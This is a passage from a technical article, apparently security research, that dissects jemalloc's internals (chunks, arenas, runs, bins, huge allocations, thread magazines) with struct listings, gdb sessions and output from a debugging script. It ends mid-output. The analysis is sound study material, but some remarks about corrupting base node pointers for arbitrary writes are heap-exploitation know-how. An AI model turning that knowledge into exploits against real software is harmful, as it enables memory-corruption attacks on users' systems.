| FreeBSD 8.2-RELEASE | 1 MB |
|
|
-----------------------------------------
|
|
| Standalone v2.2.3 | 4 MB |
|
|
-----------------------------------------
|
|
| jemalloc_linux_20080828a | 1 MB |
|
|
-----------------------------------------
|
|
| Mozilla Firefox v5.0 | 1 MB |
|
|
-----------------------------------------
|
|
| Mozilla Firefox v7.0.1 | 1 MB |
|
|
-----------------------------------------
|
|
| Mozilla Firefox v11.0 | 1 MB |
|
|
-----------------------------------------
|
|
|
|
An area of jemalloc managed memory divided into chunks looks like the
|
|
following diagram. We assume a chunk size of 4 MB; remember that chunks are
|
|
aligned to their size. The address 0xb7000000 does not have a particular
|
|
significance apart from illustrating the offsets between each chunk.
|
|
|
|
+-------------------------------------------------------------------------+
|
|
| Chunk alignment | Chunk content |
|
|
+-------------------------------------------------------------------------+
|
|
| Chunk #1 starts at: 0xb7000000 [ Arena ]
|
|
| Chunk #2 starts at: 0xb7400000 [ Arena ]
|
|
| Chunk #3 starts at: 0xb7800000 [ Arena ]
|
|
| Chunk #4 starts at: 0xb7c00000 [ Arena ]
|
|
| Chunk #5 starts at: 0xb8000000 [ Huge allocation region, see below ]
|
|
| Chunk #6 starts at: 0xb8400000 [ Arena ]
|
|
| Chunk #7 starts at: 0xb8800000 [ Huge allocation region ]
|
|
| Chunk #8 starts at: 0xb8c00000 [ Huge allocation region ]
|
|
| Chunk #9 starts at: 0xb9000000 [ Arena ]
|
|
+-------------------------------------------------------------------------+
|
|
|
|
Huge allocation regions are memory regions managed by jemalloc chunks that
|
|
satisfy huge malloc(3) requests. Apart from the huge size class, jemalloc
|
|
also has the small/medium and large size classes for end user allocations
|
|
(both managed by arenas). We analyze jemalloc's size classes of regions in
|
|
subsection 2.1.4.
|
|
|
|
Chunks are described by 'arena_chunk_t' structures (taken from the
|
|
standalone version of jemalloc; we have added and removed comments in
|
|
order to make things more clear):
|
|
|
|
|
|
[2-1]
|
|
|
|
typedef struct arena_chunk_s arena_chunk_t;
|
|
struct arena_chunk_s
|
|
{
|
|
/* The arena that owns this chunk. */
|
|
arena_t *arena;
|
|
|
|
/* A list of the corresponding arena's dirty chunks. */
|
|
ql_elm(arena_chunk_t) link_dirty;
|
|
|
|
/*
|
|
* Whether this chunk contained at some point one or more dirty pages.
|
|
*/
|
|
bool dirtied;
|
|
|
|
/* This chunk's number of dirty pages. */
|
|
size_t ndirty;
|
|
|
|
/*
|
|
* A chunk map element corresponds to a page of this chunk. The map
|
|
* keeps track of free and large/small regions.
|
|
*/
|
|
arena_chunk_map_t map[];
|
|
};
|
|
|
|
|
|
The main use of chunk maps in combination with the memory alignment of the
|
|
chunks is to enable constant time access to the management metadata of free
|
|
and large/small heap allocations (regions).
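
Because chunks are aligned to their size, going from an arbitrary region
pointer to the arena_chunk_t header that manages it (and to the right
element of its map[] array) is plain pointer arithmetic. A sketch of the
idea, assuming 4 MB chunks and 4 KB pages:

#include <stdint.h>
#include <stddef.h>

#define CHUNK_SIZE  (4UL * 1024 * 1024)   /* assumed chunk size */
#define PAGE_SHIFT  12                    /* assumed 4 KB pages */

/* round a pointer down to the start of the (aligned) chunk owning it */
static void *addr_to_chunk(void *ptr)
{
    return (void *)((uintptr_t)ptr & ~(CHUNK_SIZE - 1));
}

/* index of the page (and thus of the chunk map element) that the
 * pointer falls into within its chunk */
static size_t addr_to_pageind(void *ptr)
{
    return ((uintptr_t)ptr & (CHUNK_SIZE - 1)) >> PAGE_SHIFT;
}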
|
|
|
|
|
|
------[ 2.1.2 - Arenas (arena_t)
|
|
|
|
An arena is a structure that manages the memory areas jemalloc divides
|
|
into chunks. Arenas can span more than one chunk, and depending on the
|
|
size of the chunks, more than one page as well. As we have already
|
|
mentioned, arenas are used to mitigate lock contention problems between
|
|
threads. Therefore, allocations and deallocations from a thread always
|
|
happen on the same arena. Theoretically, the number of arenas is in direct
|
|
relation to the need for concurrency in memory allocation. In practice the
|
|
number of arenas depends on the jemalloc variant we deal with. For example,
|
|
in Firefox's jemalloc there is only one arena. In the case of single-CPU
|
|
systems there is also only one arena. In SMP systems the number of arenas
|
|
is equal to either two (in FreeBSD 8.2) or four (in the standalone variant)
|
|
times the number of available CPU cores. Of course, there is always at
|
|
least one arena.
|
|
|
|
Debugging the standalone variant with gdb:
|
|
|
|
|
|
gdb $ print ncpus
|
|
$86 = 0x4
|
|
gdb $ print narenas
|
|
$87 = 0x10
|
|
|
|
|
|
Arenas are the central jemalloc data structures as they are used to manage
|
|
the chunks (and the underlying pages) that are responsible for the small
|
|
and large allocation size classes. Specifically, the arena structure is
|
|
defined as follows:
|
|
|
|
|
|
[2-2]
|
|
|
|
typedef struct arena_s arena_t;
|
|
struct arena_s
|
|
{
|
|
/* This arena's index in the arenas array. */
|
|
unsigned ind;
|
|
|
|
/* Number of threads assigned to this arena. */
|
|
unsigned nthreads;
|
|
|
|
/* Mutex to protect certain operations. */
|
|
malloc_mutex_t lock;
|
|
|
|
/*
|
|
* Chunks that contain dirty pages managed by this arena. When jemalloc
|
|
* requires new pages these are allocated first from the dirty pages.
|
|
*/
|
|
ql_head(arena_chunk_t) chunks_dirty;
|
|
|
|
/*
|
|
* Each arena has a spare chunk in order to cache the most recently
|
|
* freed chunk.
|
|
*/
|
|
arena_chunk_t *spare;
|
|
|
|
/* The number of pages in this arena's active runs. */
|
|
size_t nactive;
|
|
|
|
/* The number of pages in unused runs that are potentially dirty. */
|
|
size_t ndirty;
|
|
|
|
/* The number of pages this arena's threads are attempting to purge. */
|
|
size_t npurgatory;
|
|
|
|
/*
|
|
* Ordered tree of this arena's available clean runs, i.e. runs
|
|
* associated with clean pages.
|
|
*/
|
|
arena_avail_tree_t runs_avail_clean;
|
|
|
|
/*
|
|
* Ordered tree of this arena's available dirty runs, i.e. runs
|
|
* associated with dirty pages.
|
|
*/
|
|
arena_avail_tree_t runs_avail_dirty;
|
|
|
|
/*
|
|
* Bins are used to store structures of free regions managed by this
|
|
* arena.
|
|
*/
|
|
arena_bin_t bins[];
|
|
};
|
|
|
|
|
|
All in all a fairly simple structure. As it is clear from the above
|
|
structure, the allocator contains a global array of arenas and an unsigned
|
|
integer representing the number of these arenas:
|
|
|
|
|
|
arena_t **arenas;
|
|
unsigned narenas;
|
|
|
|
|
|
And using gdb we can see the following:
|
|
|
|
|
|
gdb $ x/x arenas
|
|
0xb7800cc0: 0xb7800740
|
|
gdb $ print arenas[0]
|
|
$4 = (arena_t *) 0xb7800740
|
|
gdb $ x/x &narenas
|
|
0xb7fdfdc4 <narenas>: 0x00000010
|
|
|
|
|
|
At 0xb7800740 we have 'arenas[0]', that is the first arena, and at
|
|
0xb7fdfdc4 we have the number of arenas, i.e. 16.
|
|
|
|
|
|
------[ 2.1.3 - Runs (arena_run_t)
|
|
|
|
Runs are a further subdivision of the memory that jemalloc divides
|
|
into chunks. Runs exist only for small and large allocations (see
|
|
subsection 2.1.1), but not for huge allocations. In essence, a chunk
|
|
is broken into several runs. Each run is actually a set of one or more
|
|
contiguous pages (but a run cannot be smaller than one page). Therefore,
|
|
they are aligned to multiples of the page size. The runs themselves may
|
|
be non-contiguous but they are as close as possible due to the tree search
|
|
heuristics implemented by jemalloc.
|
|
|
|
The main responsibility of a run is to keep track of the state (i.e. free
|
|
or used) of end user memory allocations, or regions as these are called in
|
|
jemalloc terminology. Each run holds regions of a specific size (however
|
|
within the small and large size classes as we have mentioned) and their
|
|
state is tracked with a bitmask. This bitmask is part of a run's metadata;
|
|
these metadata are defined with the following structure:
|
|
|
|
|
|
[2-3]
|
|
|
|
typedef struct arena_run_s arena_run_t;
|
|
struct arena_run_s
|
|
{
|
|
/*
|
|
* The bin that this run is associated with. See 2.1.5 for details on
|
|
* the bin structures.
|
|
*/
|
|
arena_bin_t *bin;
|
|
|
|
/*
|
|
* The index of the next region of the run that is free. On the FreeBSD
|
|
* and Firefox flavors of jemalloc this variable is named regs_minelm.
|
|
*/
|
|
uint32_t nextind;
|
|
|
|
/* The number of free regions in the run. */
|
|
unsigned nfree;
|
|
|
|
/*
|
|
* Bitmask for the regions in this run. Each bit corresponds to one
|
|
* region. A 0 means the region is used, and an 1 bit value that the
|
|
* corresponding region is free. The variable nextind (or regs_minelm
|
|
* on FreeBSD and Firefox) is the index of the first non-zero element
|
|
* of this array.
|
|
*/
|
|
unsigned regs_mask[];
|
|
};
|
|
|
|
|
|
Don't forget to re-read the comments ;)
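
To make the bookkeeping concrete: finding the first free region of a run
boils down to locating the first set bit of regs_mask, starting the scan
at nextind (regs_minelm). A sketch, assuming 32-bit mask elements:

/* sketch: return the index of the first free region of a run, or -1
 * if the run is full; 'nelms' is the number of 32-bit elements of the
 * mask (regs_mask_nelms in the owning bin, see 2.1.5) */
static int first_free_region(unsigned *regs_mask, unsigned nelms,
                             unsigned nextind)
{
    unsigned i;

    for (i = nextind; i < nelms; i++) {
        if (regs_mask[i] != 0)    /* at least one set bit == one free */
            return (int)(i * 32 + __builtin_ctz(regs_mask[i]));
    }

    return -1;
}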
|
|
|
|
|
|
------[ 2.1.4 - Regions/Allocations
|
|
|
|
In jemalloc the term 'regions' applies to the end user memory areas
|
|
returned by malloc(3). As we have briefly mentioned earlier, regions are
|
|
divided into three classes according to their size, namely a) small/medium,
|
|
b) large and c) huge.
|
|
|
|
Huge regions are considered those that are bigger than the chunk size minus
|
|
the size of some jemalloc headers. For example, in the case that the chunk
|
|
size is 4 MB (4096 KB) then a huge region is an allocation greater than
|
|
4078 KB. Small/medium are the regions that are smaller than a page. Large
|
|
are the regions that are smaller than the huge regions (chunk size minus
|
|
some headers) and also larger than the small/medium regions (page size).
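
Using the numbers from the example above (4 MB chunks, 4 KB pages and
roughly 18 KB of chunk headers), the classification of a requested size
looks as follows (a sketch; the exact thresholds depend on the jemalloc
flavor and its compile-time options):

#include <stddef.h>

#define PAGE_SIZE   4096UL
#define CHUNK_SIZE  (4UL * 1024 * 1024)
#define CHUNK_HDRS  (18UL * 1024)         /* assumed header overhead */

enum size_class { SMALL_MEDIUM, LARGE, HUGE };

static enum size_class classify(size_t size)
{
    if (size > CHUNK_SIZE - CHUNK_HDRS)
        return HUGE;              /* dedicated chunks, see 2.1.6 */
    if (size < PAGE_SIZE)
        return SMALL_MEDIUM;      /* served from runs through bins */
    return LARGE;                 /* a dedicated run per allocation */
}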
|
|
|
|
Huge regions have their own metadata and are managed separately from
|
|
small/medium and large regions. Specifically, they are managed by a
|
|
global to the allocator red-black tree and they have their own dedicated
|
|
and contiguous chunks. Large regions have their own runs, that is each
|
|
large allocation has a dedicated run. Their metadata are situated on
|
|
the corresponding arena chunk header. Small/medium regions are placed
|
|
on different runs according to their specific size. As we have seen in
|
|
2.1.3, each run has its own header in which there is a bitmask array
|
|
specifying the free and the used regions in the run.
|
|
|
|
In the standalone flavor of jemalloc the smallest run is that for regions
|
|
of size 4 bytes. The next run is for regions of size 8 bytes, the next
|
|
for 16 bytes, and so on.
|
|
|
|
When we do not mention it specifically, we deal with small/medium and
|
|
large region classes. We investigate the huge region size class separately
|
|
in subsection 2.1.6.
|
|
|
|
|
|
------[ 2.1.5 - Bins (arena_bin_t)
|
|
|
|
Bins are used by jemalloc to store free regions. Bins organize the free
|
|
regions via runs and also keep metadata about their regions, like for
|
|
example the size class, the total number of regions, etc. A specific bin
|
|
may be associated with several runs, however a specific run can only be
|
|
associated with a specific bin, i.e. there is a one-to-many correspondence
|
|
between bins and runs. Bins have their associated runs organized in a tree.
|
|
|
|
Each bin has an associated size class and stores/manages regions of this
|
|
size class. A bin's regions are managed and accessed through the bin's
|
|
runs. Each bin has a member element representing the most recently used run
|
|
of the bin, called 'current run' with the variable name runcur. A bin also
|
|
has a tree of runs with available/free regions. This tree is used when the
|
|
current run of the bin is full, that is it doesn't have any free regions.
|
|
|
|
A bin structure is defined as follows:
|
|
|
|
|
|
[2-4]
|
|
|
|
typedef struct arena_bin_s arena_bin_t;
|
|
struct arena_bin_s
|
|
{
|
|
/*
|
|
* Operations on the runs (including the current run) of the bin
|
|
* are protected via this mutex.
|
|
*/
|
|
malloc_mutex_t lock;
|
|
|
|
/*
|
|
* The current run of the bin that manages regions of this bin's size
|
|
* class.
|
|
*/
|
|
arena_run_t *runcur;
|
|
|
|
/*
|
|
* The tree of the bin's associated runs (all responsible for regions
|
|
* of this bin's size class of course).
|
|
*/
|
|
arena_run_tree_t runs;
|
|
|
|
/* The size of this bin's regions. */
|
|
size_t reg_size;
|
|
|
|
/*
|
|
* The total size of a run of this bin. Remember that each run may be
|
|
* comprised of more than one pages.
|
|
*/
|
|
size_t run_size;
|
|
|
|
/* The total number of regions in a run of this bin. */
|
|
uint32_t nregs;
|
|
|
|
/*
|
|
* The total number of elements in the regs_mask array of a run of this
|
|
* bin. See 2.1.3 for more information on regs_mask.
|
|
*/
|
|
uint32_t regs_mask_nelms;
|
|
|
|
/*
|
|
* The offset of the first region in a run of this bin. This can be
|
|
* non-zero due to alignment requirements.
|
|
*/
|
|
uint32_t reg0_offset;
|
|
};
|
|
|
|
|
|
As an example, consider the following three allocations and that the
|
|
jemalloc flavor under investigation has 2 bytes as the smallest possible
|
|
allocation size (file test-bins.c in the code archive, example run on
|
|
FreeBSD):
|
|
|
|
|
|
one = malloc(2);
|
|
two = malloc(8);
|
|
three = malloc(16);
|
|
|
|
|
|
Using gdb let's explore jemalloc's structures. First let's see the runs
|
|
that the above allocations created in their corresponding bins:
|
|
|
|
|
|
gdb $ print arenas[0].bins[0].runcur
|
|
$25 = (arena_run_t *) 0xb7d01000
|
|
gdb $ print arenas[0].bins[1].runcur
|
|
$26 = (arena_run_t *) 0x0
|
|
gdb $ print arenas[0].bins[2].runcur
|
|
$27 = (arena_run_t *) 0xb7d02000
|
|
gdb $ print arenas[0].bins[3].runcur
|
|
$28 = (arena_run_t *) 0xb7d03000
|
|
gdb $ print arenas[0].bins[4].runcur
|
|
$29 = (arena_run_t *) 0x0
|
|
|
|
|
|
Now let's see the size classes of these bins:
|
|
|
|
|
|
gdb $ print arenas[0].bins[0].reg_size
|
|
$30 = 0x2
|
|
gdb $ print arenas[0].bins[1].reg_size
|
|
$31 = 0x4
|
|
gdb $ print arenas[0].bins[2].reg_size
|
|
$32 = 0x8
|
|
gdb $ print arenas[0].bins[3].reg_size
|
|
$33 = 0x10
|
|
gdb $ print arenas[0].bins[4].reg_size
|
|
$34 = 0x20
|
|
|
|
|
|
We can see that our three allocations of sizes 2, 8 and 16 bytes resulted
|
|
in jemalloc creating runs for these size classes. Specifically, 'bin[0]'
|
|
is responsible for the size class 2 and its current run is at 0xb7d01000,
|
|
'bin[1]' is responsible for the size class 4 and doesn't have a current
|
|
run since no allocations of size 4 were made, 'bin[2]' is responsible
|
|
for the size class 8 with its current run at 0xb7d02000, and so on. In the
|
|
code archive you can find a Python script for gdb named unmask_jemalloc.py
|
|
for easily enumerating the size of bins and other internal information in
|
|
the various jemalloc flavors (see 2.1.8 for a sample run).
|
|
|
|
At this point we should mention that in jemalloc an allocation of zero
|
|
bytes (that is a malloc(0) call) will return a region of the smallest size
|
|
class; in the above example a region of size 2. The smallest size class
|
|
depends on the flavor of jemalloc. For example, in the standalone flavor it
|
|
is 4 bytes.
|
|
|
|
The following diagram summarizes our analysis of jemalloc up to this point:
|
|
|
|
.----------------------------------. .---------------------------.
|
|
.----------------------------------. | +--+-----> arena_chunk_t |
|
|
.---------------------------------. | | | | |
|
|
| arena_t | | | | | .---------------------. |
|
|
| | | | | | | | |
|
|
| .--------------------. | | | | | | arena_run_t | |
|
|
| | arena_chunk_t list |-----+ | | | | | | | |
|
|
| `--------------------' | | | | | | | .-----------. | |
|
|
| | | | | | | | | page | | |
|
|
| arena_bin_t bins[]; | | | | | | | +-----------+ | |
|
|
| .------------------------. | | | | | | | | region | | |
|
|
| | bins[0] ... bins[27] | | | | | | | | +-----------+ | |
|
|
| `------------------------' | | |.' | | | | region | | |
|
|
| | | |.' | | | +-----------+ | |
|
|
`-----+----------------------+----' | | | | region | | |
|
|
| | | | | +-----------+ | |
|
|
| | | | | . . . | |
|
|
| v | | | .-----------. | |
|
|
| .-------------------. | | | | page | | |
|
|
| | .---------------. | | | | +-----------+ | |
|
|
| | | arena_chunk_t |-+---+ | | | region | | |
|
|
| | `---------------' | | | +-----------+ | |
|
|
| [2-5] | .---------------. | | | | region | | |
|
|
| | | arena_chunk_t | | | | +-----------+ | |
|
|
| | `---------------' | | | | region | | |
|
|
| | . . . | | | +-----------+ | |
|
|
| | .---------------. | | | | |
|
|
| | | arena_chunk_t | | | `---------------------' |
|
|
| | `---------------' | | [2-6] |
|
|
| | . . . | | .---------------------. |
|
|
| `-------------------' | | | |
|
|
| +----+--+---> arena_run_t | |
|
|
| | | | | |
|
|
+----------+ | | | .-----------. | |
|
|
| | | | | page | | |
|
|
| | | | +-----------+ | |
|
|
| | | | | region | | |
|
|
v | | | +-----------+ | |
|
|
.--------------------------. | | | | region | | |
|
|
| arena_bin_t | | | | +-----------+ | |
|
|
| bins[0] (size 8) | | | | | region | | |
|
|
| | | | | +-----------+ | |
|
|
| .----------------------. | | | | . . . | |
|
|
| | arena_run_t *runcur; |-+---------+ | | .-----------. | |
|
|
| `----------------------' | | | | page | | |
|
|
`--------------------------' | | +-----------+ | |
|
|
| | | region | | |
|
|
| | +-----------+ | |
|
|
| | | region | | |
|
|
| | +-----------+ | |
|
|
| | | region | | |
|
|
| | +-----------+ | |
|
|
| | | |
|
|
| `---------------------' |
|
|
`---------------------------'
|
|
|
|
|
|
------[ 2.1.6 - Huge allocations
|
|
|
|
Huge allocations are not very interesting for the attacker but they are an
|
|
integral part of jemalloc which may affect the exploitation process. Simply
|
|
put, huge allocations are represented by 'extent_node_t' structures that
|
|
are ordered in a global red black tree which is common to all threads.
|
|
|
|
|
|
[2-7]
|
|
|
|
/* Tree of extents. */
|
|
typedef struct extent_node_s extent_node_t;
|
|
struct extent_node_s {
|
|
#ifdef MALLOC_DSS
|
|
/* Linkage for the size/address-ordered tree. */
|
|
rb_node(extent_node_t) link_szad;
|
|
#endif
|
|
|
|
/* Linkage for the address-ordered tree. */
|
|
rb_node(extent_node_t) link_ad;
|
|
|
|
/* Pointer to the extent that this tree node is responsible for. */
|
|
void *addr;
|
|
|
|
/* Total region size. */
|
|
size_t size;
|
|
};
|
|
typedef rb_tree(extent_node_t) extent_tree_t;
|
|
|
|
|
|
The 'extent_node_t' structures are allocated in small memory regions
|
|
called base nodes. Base nodes do not affect the layout of end user heap
|
|
allocations since they are served either by the DSS or by individual
|
|
memory mappings acquired by 'mmap()'. The actual method used to allocate
|
|
free space depends on how jemalloc was compiled with 'mmap()' being
|
|
the default.
|
|
|
|
|
|
/* Allocate an extent node with which to track the chunk. */
|
|
node = base_node_alloc();
|
|
...
|
|
|
|
ret = chunk_alloc(csize, zero);
|
|
...
|
|
|
|
/* Insert node into huge. */
|
|
node->addr = ret;
|
|
node->size = csize;
|
|
...
|
|
|
|
malloc_mutex_lock(&huge_mtx);
|
|
extent_tree_ad_insert(&huge, node);
|
|
|
|
|
|
The most interesting thing about huge allocations is the fact that free
|
|
base nodes are kept in a simple array of pointers called 'base_nodes'. The
|
|
aforementioned array, although defined as a simple pointer, is handled
|
|
as if it was a two dimensional array holding pointers to available base
|
|
nodes.
|
|
|
|
|
|
static extent_node_t *base_nodes;
|
|
...
|
|
|
|
static extent_node_t *
|
|
base_node_alloc(void)
|
|
{
|
|
extent_node_t *ret;
|
|
|
|
malloc_mutex_lock(&base_mtx);
|
|
if (base_nodes != NULL) {
|
|
ret = base_nodes;
|
|
base_nodes = *(extent_node_t **)ret;
|
|
...
|
|
}
|
|
...
|
|
}
|
|
|
|
static void
|
|
base_node_dealloc(extent_node_t *node)
|
|
{
|
|
malloc_mutex_lock(&base_mtx);
|
|
*(extent_node_t **)node = base_nodes;
|
|
base_nodes = node;
|
|
...
|
|
}
|
|
|
|
|
|
Taking into account how 'base_node_alloc()' works, it's obvious that if
|
|
an attacker corrupts the pages that contain the base node pointers, she
|
|
can force jemalloc to use an arbitrary address as a base node pointer. This
|
|
itself can lead to interesting scenarios but they are out of the scope
|
|
of this article since the chances of achieving something like this are
|
|
quite low. Nevertheless, a quick review of the code reveals that one
|
|
may be able to achieve this goal by forcing huge allocations once she
|
|
controls the physically last region of an arena. The attack is possible
|
|
if and only if the mappings that will hold the base pointers are allocated
|
|
right after the attacker controlled region.
|
|
|
|
A careful reader would have noticed that if an attacker manages to pass
|
|
a controlled value as the first argument to 'base_node_dealloc()' she
|
|
can get a '4 bytes anywhere' result. Unfortunately, as far as the authors
|
|
can see, this is possible only if the global red black tree holding the
|
|
huge allocations is corrupted. This situation is far more difficult to
|
|
achieve than the one described in the previous paragraph. Nevertheless,
|
|
we would really like to hear from anyone that manages to do so.
|
|
|
|
|
|
------[ 2.1.7 - Thread caches (tcache_t)
|
|
|
|
In the previous paragraphs we mentioned how jemalloc allocates new arenas
|
|
at will in order to avoid lock contention. In this section we will focus on
|
|
the mechanisms that are activated on multicore systems and multithreaded
|
|
programs.
|
|
|
|
Let's set the following straight:
|
|
|
|
1) A multicore system is the reason jemalloc allocates more than one arena.
|
|
On a unicore system there's only one available arena, even on multithreaded
|
|
applications. However, the Firefox jemalloc variant has just one arena
|
|
hardcoded, therefore it has no thread caches.
|
|
|
|
2) On a multicore system, even if the target application runs on a single
|
|
thread, more than one arena is used.
|
|
|
|
No matter what the number of cores on the system is, a multithreaded
|
|
application utilizing jemalloc will make use of the so called 'magazines'
|
|
(also called 'tcaches' on newer versions of jemalloc). Magazines (tcaches)
|
|
are thread local structures used to avoid thread blocking problems.
|
|
Whenever a thread wishes to allocate a memory region, jemalloc will use
|
|
those thread specific data structures instead of following the normal code
|
|
path.
|
|
|
|
|
|
void *
|
|
arena_malloc(arena_t *arena, size_t size, bool zero)
|
|
{
|
|
...
|
|
|
|
if (size <= bin_maxclass) {
|
|
#ifdef MALLOC_MAG
|
|
if (__isthreaded && opt_mag) {
|
|
mag_rack_t *rack = mag_rack;
|
|
if (rack == NULL) {
|
|
rack = mag_rack_create(arena);
|
|
...
|
|
|
|
return (mag_rack_alloc(rack, size, zero));
|
|
}
|
|
else
|
|
#endif
|
|
return (arena_malloc_small(arena, size, zero));
|
|
}
|
|
...
|
|
}
|
|
|
|
|
|
The 'opt_mag' variable is true by default. The variable '__isthreaded' is
|
|
exported by 'libthr', the pthread implementation for FreeBSD and is set to
|
|
1 on a call to 'pthread_create()'. Obviously, the rest of the details are
|
|
out of the scope of this article.
|
|
|
|
In this section we will analyze thread magazines, but the exact same
|
|
principles apply to the tcaches (the change in the nomenclature is probably
|
|
the most notable difference between them).
|
|
|
|
The behavior of thread magazines is affected by the following macros that
|
|
are _defined_:
|
|
|
|
MALLOC_MAG - Make use of thread magazines.
|
|
|
|
MALLOC_BALANCE - Balance arena usage using a simple linear random number
|
|
generator (have a look at 'choose_arena()').
|
|
|
|
The following constants are _undefined_:
|
|
|
|
NO_TLS - TLS _is_ available on __i386__
|
|
|
|
Furthermore, 'opt_mag', the jemalloc runtime option controlling thread
|
|
magazine usage, is, as we mentioned earlier, enabled by default.
|
|
|
|
The following figure depicts the relationship between the various thread
|
|
magazines' structures.
|
|
|
|
|
|
.-------------------------------------------.
|
|
| mag_rack_t |
|
|
| |
|
|
| bin_mags_t bin_mags[]; |
|
|
| |
|
|
| .-------------------------------------. |
|
|
| | bin_mags[0] ... bin_mags[nbins - 1] | |
|
|
| `-------------------------------------' |
|
|
`--------|----------------------------------'
|
|
|
|
|
| .------------------.
|
|
| +----------->| mag_t |
|
|
v | | |
|
|
.----------------------. | | void *rounds[] |
|
|
| bin_mags_t | | | ... |
|
|
| | | `------------------'
|
|
| .----------------. | |
|
|
| | mag_t *curmag; |-----------+
|
|
| `----------------' |
|
|
| ... |
|
|
`----------------------'
|
|
|
|
|
|
The core of the aforementioned thread local metadata is the 'mag_rack_t'. A
|
|
'mag_rack_t' is a simplified equivalent of an arena. It is composed of a
|
|
single array of 'bin_mags_t' structures. Each thread in a program is
|
|
associated with a private 'mag_rack_t' which has a lifetime equal to the
|
|
application's.
|
|
|
|
|
|
typedef struct mag_rack_s mag_rack_t;
|
|
struct mag_rack_s {
|
|
bin_mags_t bin_mags[1]; /* Dynamically sized. */
|
|
};
|
|
|
|
|
|
Bins belonging to magazine racks are represented by 'bin_mags_t' structures
|
|
(notice the plural form).
|
|
|
|
|
|
/*
|
|
* Magazines are lazily allocated, but once created, they remain until the
|
|
* associated mag_rack is destroyed.
|
|
*/
|
|
typedef struct bin_mags_s bin_mags_t;
|
|
struct bin_mags_s {
|
|
mag_t *curmag;
|
|
mag_t *sparemag;
|
|
};
|
|
|
|
typedef struct mag_s mag_t;
|
|
struct mag_s {
|
|
size_t binind; /* Index of associated bin. */
|
|
size_t nrounds;
|
|
void *rounds[1]; /* Dynamically sized. */
|
|
};
|
|
|
|
|
|
Just like a normal bin is associated with a run, a 'bin_mags_t' structure
|
|
is associated with a magazine pointed to by 'curmag' (recall 'runcur'). A
|
|
magazine is nothing more than a simple array of void pointers which hold
|
|
memory addresses of preallocated memory regions which are exclusively used
|
|
by a single thread. Magazines are populated in function 'mag_load()' as
|
|
seen below.
|
|
|
|
|
|
void
|
|
mag_load(mag_t *mag)
|
|
{
|
|
arena_t *arena;
|
|
arena_bin_t *bin;
|
|
arena_run_t *run;
|
|
void *round;
|
|
size_t i;
|
|
|
|
/* Pick a random arena and the bin responsible for servicing
|
|
* the required size class.
|
|
*/
|
|
arena = choose_arena();
|
|
bin = &arena->bins[mag->binind];
|
|
...
|
|
|
|
for (i = mag->nrounds; i < max_rounds; i++) {
|
|
...
|
|
|
|
if ((run = bin->runcur) != NULL && run->nfree > 0)
|
|
round = arena_bin_malloc_easy(arena, bin, run); /* [3-23] */
|
|
else
|
|
round = arena_bin_malloc_hard(arena, bin); /* [3-24] */
|
|
|
|
if (round == NULL)
|
|
break;
|
|
|
|
/* Each 'rounds' holds a preallocated memory region. */
|
|
mag->rounds[i] = round;
|
|
}
|
|
|
|
...
|
|
mag->nrounds = i;
|
|
}
|
|
|
|
|
|
When a thread calls 'malloc()', the call chain eventually reaches
|
|
'mag_rack_alloc()' and then 'mag_alloc()'.
|
|
|
|
|
|
/* Just return the next available void pointer. It points to one of the
|
|
* preallocated memory regions.
|
|
*/
|
|
void *
|
|
mag_alloc(mag_t *mag)
|
|
{
|
|
if (mag->nrounds == 0)
|
|
return (NULL);
|
|
mag->nrounds--;
|
|
|
|
return (mag->rounds[mag->nrounds]);
|
|
}
|
|
|
|
|
|
The most notable thing about magazines is the fact that 'rounds', the array
|
|
of void pointers, as well as all the related thread metadata (magazine
|
|
racks, magazine bins and so on) are allocated by normal calls to functions
|
|
'arena_bin_malloc_xxx()' ([3-23], [3-24]). This results in the thread
|
|
metadata lying around normal memory regions.
|
|
|
|
|
|
------[ 2.1.8 - Unmask jemalloc
|
|
|
|
As we are sure you are all aware, since version 7.0, gdb can be scripted
|
|
with Python. In order to unmask and bring to light the internals of the
|
|
various jemalloc flavors, we have developed a Python script for gdb
|
|
appropriately named unmask_jemalloc.py. The following is a sample run of
|
|
the script on Firefox 11.0 on Linux x86 (edited for readability):
|
|
|
|
|
|
$ ./firefox-bin &
|
|
|
|
$ gdb -x ./gdbinit -p `ps x | grep firefox | grep -v grep \
|
|
| grep -v debug | awk '{print $1}'`
|
|
|
|
GNU gdb (GDB) 7.4-debian
|
|
...
|
|
Attaching to process 3493
|
|
add symbol table from file "/dbg/firefox-latest-symbols/firefox-bin.dbg" at
|
|
.text_addr = 0x80494b0
|
|
add symbol table from file "/dbg/firefox-latest-symbols/libxul.so.dbg" at
|
|
.text_addr = 0xb5b9a9d0
|
|
...
|
|
[Thread 0xa4ffdb70 (LWP 3533) exited]
|
|
[Thread 0xa57feb70 (LWP 3537) exited]
|
|
[New Thread 0xa57feb70 (LWP 3556)]
|
|
[Thread 0xa57feb70 (LWP 3556) exited]
|
|
|
|
gdb $ source unmask_jemalloc.py
|
|
gdb $ unmask_jemalloc runs
|
|
|
|
[jemalloc] [number of arenas: 1]
|
|
[jemalloc] [number of bins: 24]
|
|
[jemalloc] [no magazines/thread caches detected]
|
|
|
|
[jemalloc] [arena #00] [bin #00] [region size: 0x0004]
|
|
[current run at: 0xa52d9000]
|
|
[jemalloc] [arena #00] [bin #01] [region size: 0x0008]
|
|
[current run at: 0xa37c8000]
|
|
[jemalloc] [arena #00] [bin #02] [region size: 0x0010]
|
|
[current run at: 0xa372c000]
|
|
[jemalloc] [arena #00] [bin #03] [region size: 0x0020]
|
|
[current run at: 0xa334d000]
|
|
[jemalloc] [arena #00] [bin #04] [region size: 0x0030]
|
|
[current run at: 0xa3347000]
|
|
[jemalloc] [arena #00] [bin #05] [region size: 0x0040]
|
|
[current run at: 0xa334a000]
|
|
[jemalloc] [arena #00] [bin #06] [region size: 0x0050]
|
|
[current run at: 0xa3732000]
|
|
[jemalloc] [arena #00] [bin #07] [region size: 0x0060]
|
|
[current run at: 0xa3701000]
|
|
[jemalloc] [arena #00] [bin #08] [region size: 0x0070]
|
|
[current run at: 0xa3810000]
|
|
[jemalloc] [arena #00] [bin #09] [region size: 0x0080]
|
|
[current run at: 0xa3321000]
|
|
[jemalloc] [arena #00] [bin #10] [region size: 0x00f0]
|
|
[current run at: 0xa57c7000]
|
|
[jemalloc] [arena #00] [bin #11] [region size: 0x0100]
|
|
[current run at: 0xa37e9000]
|
|
[jemalloc] [arena #00] [bin #12] [region size: 0x0110]
|
|
[current run at: 0xa5a9b000]
|
|
[jemalloc] [arena #00] [bin #13] [region size: 0x0120]
|
|
[current run at: 0xa56ea000]
|
|
[jemalloc] [arena #00] [bin #14] [region size: 0x0130]
|
|
[current run at: 0xa3709000]
|
|
